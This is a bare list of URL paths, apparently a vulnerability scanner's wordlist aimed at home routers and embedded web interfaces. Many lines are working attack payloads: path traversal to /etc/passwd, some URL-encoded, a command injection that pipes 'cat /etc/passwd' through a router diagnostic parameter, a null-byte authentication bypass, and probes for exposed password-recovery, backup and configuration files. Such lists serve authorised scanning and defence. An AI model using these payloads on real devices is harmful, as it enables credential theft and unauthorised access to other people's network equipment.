/cgi-bin/webproc?getpage=/etc/passwd&var:page=deviceinfo
/wlsecurity.html
/login/../../../etc/passwd
/cgi-bin/webproc?getpage=/etc/passwd&var:language=en_us&var:page=wizardfifth
/passwordrecovered.cgi?id={{rand_base(5)}}
/uir//etc/passwd
/chkisg.htm%3FSip%3D1.1.1.1%20%7C%20cat%20%2Fetc%2Fpasswd
/../../../../../../../../../../../../etc/passwd
/action/usermanager.htm
/cgi-bin/config.exp
/api-third-party/download/extdisks../etc/passwd
/getcfg.php
/index.asp
/apply.cgi
/cgi-bin/ExportLogs.sh
/api/sys/set_passwd
/lang/log/httpd.log
/api/sys/login
/password.cgi
/passwordrecovered.cgi?id=nuclei
/css/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd
/setup.cgi?next_file=debug.htm&x=currentsetting.htm
/wifi_base.shtml
/psiBackupInfo
/adminpasswd.cgi
/backupsettings.conf
/RST_status.htm%00currentsetting.htm
/wizardset.htm
/easy_setup.htm
/password.htm
/currentsetting.htm
